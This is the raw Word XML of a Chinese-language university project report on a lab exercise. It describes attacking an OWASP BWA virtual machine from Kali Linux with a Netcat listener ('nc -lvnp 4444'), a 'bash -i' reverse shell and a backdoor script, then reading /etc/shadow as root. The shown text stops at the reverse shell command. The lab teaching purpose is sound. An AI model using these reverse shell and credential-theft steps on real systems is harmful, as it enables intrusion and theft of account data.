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82FF8" w14:textId="77777777" w:rsidR="00C91422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資訊工程學系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785FC7C7" w14:textId="77777777" w:rsidR="00F67FA2" w:rsidRPr="00F67FA2" w:rsidRDefault="00F67FA2" w:rsidP="00F67FA2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 w:rsidRPr="00F67FA2">
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>114學年度專題報告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DB17A5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0A26F71A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13E251FA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C6F99C4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106AEC04" w14:textId="77777777" w:rsidR="00C91422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題目：從滲透到防禦(基於 Kali Linux 的反向 Shell 攻擊與後門植入實戰演練)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ED1A03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530BC6A5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05D094F7" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422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2DEF8639" w14:textId="77777777" w:rsidR="00C91422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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>指導老師：       教授</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FCFEEA" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422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7CCC3869" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422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419D1971" w14:textId="77777777" w:rsidR="00C91422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sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>組長:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>高恩在</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
        <w:t>組員:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E5E349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084D3C31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160AE105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3A673FA7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2601C468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2CD8A259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0DD8FEA3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58AD5F92" w14:textId="77777777" w:rsidR="00C91422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中華民國 114年6月26日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E385243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lastRenderedPageBreak/>
        <w:t>目錄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B88F3C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一、 摘要 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BC1CB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二、 研究背景與目的 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B267026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三、 專題內容 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA92EC2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四、 研究方法 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717390DB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五、 流程圖 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79890D3A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六、 預計完成之工作項目及具體成果 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD6B06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七、 工作分配與預定進度甘梯圖 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788F8FE1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八、 遭遇問題與解決方案 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368FAE9D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 xml:space="preserve">九、 儀器設備需求表 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A8AE3" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:color w:val="141823"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>十、 參考資料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181EF5BE" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>十一、 實驗圖片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6343D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2CCF0D89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E470089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24EC515A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8F9AB69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D319A16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2F107A6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3BF33FC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93A2BBB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7AC6EF7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7D29BEE3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58CFD68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CE24AD5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205DB53B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5FE68D5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C088965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7E8BD59C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58EAD6B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D9FC380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51BF957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2D395167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AF4AB3F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75A46A8" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422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D5592C5" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EC4D16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5255FD56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47E4BCDC" w14:textId="77777777" w:rsidR="00C91422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一、摘要</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2E1DF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本專題旨在模擬駭客攻擊流程，運用 Kali Linux 工具集對 OWASP Broken Web Applications（BWA）進行滲透測試，成功獲取遠端系統 root 權限並取得機敏檔案（如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/shadow）。測試過程涵蓋端口掃描、服務分析、漏洞利用、反向 shell 建立、資訊蒐集與網頁服務分析，完整還原實務中攻擊者的操作路徑。本專題不僅提供系統性攻擊流程，也強調防禦觀點與系統安全意識之重要性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D41331F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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、研究背景與目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29531FA7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隨著 Web 應用系統日益複雜，潛藏於其中的安全漏洞亦層出不窮。OWASP BWA 提供一個合法、安全的靶場環境，用以學習與測試常見的 Web 弱點及其攻擊手法。本研究以 Kali Linux 為主要攻擊平</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>臺</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>，目的包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F21904" w14:textId="77777777" w:rsidR="00C91422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熟悉滲透測試工具與流程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B69602" w14:textId="77777777" w:rsidR="00C91422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執行反向 Shell 建立並取得 root 權限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A57F67" w14:textId="77777777" w:rsidR="00C91422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驗證靶機系統資訊洩露（如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/passwd、/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/shadow）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5915607E" w14:textId="77777777" w:rsidR="00C91422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建立從掃描到攻擊的完整攻擊鏈。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423A5F4" w14:textId="77777777" w:rsidR="00C91422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累積合法環境下之紅隊實作經驗。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A255DD" w14:textId="77777777" w:rsidR="00C91422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三、專題內容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4B90F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本研究內容涵蓋以下重點：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC29A6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建置 Kali Linux 與 OWASP BWA 虛擬環境（透過 VirtualBox）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D69DCD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確認雙機 IP：攻擊端 Kali（192.168.56.111），目標端 OWASP（192.168.56.105）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21706271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使用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 建立 Listener，實現反向 Shell 回連</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D5FE4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提權至</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> root 權限後，讀取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/shadow、/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/passwd、Web 根目錄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D4B2AD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執行後門腳本並檢視開放端口與 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D772A2" w14:textId="77777777" w:rsidR="00C91422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資訊蒐集與網頁資源分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65559E3F" w14:textId="77777777" w:rsidR="00C91422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四、研究方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A4B839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本研究採用以下滲透流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C144F" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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環境建置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>：以 VirtualBox 建立 Kali Linux 與 OWASP BWA 主機。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE3FDFB" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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端口與服務掃描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve">：透過 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve">、netstat 與 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a 探測主機服務與連線。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E935382" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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反向 Shell 注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve">：於 Kali 上使用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 等待回連，目標端執行 .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 後門腳本或 bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F78D74" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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權限提升與資料存取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>：取得 root 權限，讀取敏感檔案與登入紀錄。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA4BD9" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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網站分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve">：列出 /var/www/ 目錄中網頁專案如 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>bwapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>webgoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>、evil 等</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>進行資安評估</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C79DB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531B9EF9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65AE9D2F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76D0EF09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486F19BD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693B5008" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="237A4416" w14:textId="77777777" w:rsidR="00C91422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五、流程圖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2492B92A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0" distB="0" distL="0" distR="0" wp14:anchorId="3423FFCE" wp14:editId="64196317">
            <wp:extent cx="4870800" cy="5040000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212578576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800" cy="50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64A70" w14:textId="77777777" w:rsidR="00C91422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六、預計完成之工作項目及具體成果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F27DC8" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl/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工作項目表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ac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69"/>
        <w:gridCol w:w="5127"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="66E417FC" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3169" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FD04C5B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工作項目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="650E0BB5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預期成果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="5E071B87" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3169" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57791AB4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虛擬機環境建置</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                <w:b/>
              </w:rPr>
              <w:t>與網段配置</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C024467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完整連通之 Kali &amp; OWASP 靶機環境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="2C004FCF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3169" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51B7EA66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反向 Shell 測試與後門腳本實作</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17A83B86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成功連線並控制靶機，建立遠端命令介面</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="7050A217" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3169" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="230280A8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系統與網頁資源分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="320E794F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收集敏感系統資訊、存取網站目錄、分析網頁弱點結構</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="5A1BDDF8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3169" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="606736C1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完整</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                <w:b/>
              </w:rPr>
              <w:t>實驗截圖與</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                <w:b/>
              </w:rPr>
              <w:t>流程紀錄</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5127" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72AC6141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系統命令與流程圖完整呈現，支援最終成果展示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A1F4789" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0847CF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61B79F8C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5C70A569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68868808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lastRenderedPageBreak/>
        <w:t>實驗圖片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D8169" w14:textId="77777777" w:rsidR="00C9142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前置作業(示意)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FA5F33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noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CFB60B7" wp14:editId="12BA33E2">
            <wp:extent cx="5274310" cy="2834640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="212578576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3215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從攻擊機（Kali）將 payload（如惡意 ELF 檔案）傳送到目標機（OWASP），測試檔案傳送是否成功、是否能在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>內部網段滲透</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70C3AD98" w14:textId="77777777" w:rsidR="00C9142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實驗圖片(使用反彈shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7A4FE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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C65320E" wp14:editId="213E0B78">
            <wp:extent cx="3920400" cy="2106000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21257857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17904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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="644ABFE7" wp14:editId="22B0DB6F">
            <wp:extent cx="3920400" cy="2106000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21257857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C7900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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75DEF4FB" wp14:editId="05694237">
            <wp:extent cx="3920400" cy="2106000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21257857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ADA13" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33CD0C61" w14:textId="77777777" w:rsidR="00C91422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實驗報告：OWASP BWA 系統弱點測試</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60BA48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一、實驗目標與環境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D73C38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目的：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">透過已知漏洞入侵目標主機 OWASP BWA，建立反彈 shell </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>並提權</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>，蒐集敏感資訊以驗證系統弱點存在。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2DDE93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環境設定：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C08A03" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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攻擊者主機（Kali Linux）：192.168.56.111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7B826A" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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目標主機（OWASP BWA）：192.168.56.105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946D082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二、反向 Shell 建立過程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB9E750" w14:textId="77777777" w:rsidR="00C91422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Kali 啟動 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 監聽：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EBCAF8" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="360"/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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD65CF0" w14:textId="77777777" w:rsidR="00C91422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OWASP 傳送反向 shell：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB86304" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="36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bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
